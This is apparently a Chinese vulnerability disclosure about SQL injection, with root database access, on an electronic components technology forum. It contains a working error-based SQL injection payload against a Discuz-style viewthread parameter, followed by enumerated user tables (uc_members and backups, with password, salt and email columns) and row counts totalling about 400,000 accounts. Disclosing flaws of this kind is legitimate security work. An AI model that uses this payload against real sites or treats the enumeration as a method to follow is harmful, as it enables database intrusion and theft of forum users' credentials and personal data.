电子元件技术论坛存在SQL注入(root权限约40W条用户数据)

?mod=viewthread&tid=261548 AND (SELECT 2922 FROM(SELECT COUNT(*),CONCAT(0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)




 







约40W条账号信息泄漏
 

... uc_members 253753 uid username password email myid myidkey regip regdate lastloginip lastlogintime salt secques uc_members_bak090622 54539 uid username password email myid myidkey regip regdate lastloginip lastlogintime salt uc_members_bak090713 75588 uid username password email myid myidkey regip regdate lastloginip lastlogintime salt uc_members_bak20090429 21059 uid username password email myid myidkey regip regdate lastloginip lastlogintime salt ... DB_NUM:5Table_Num:1286Data:90193405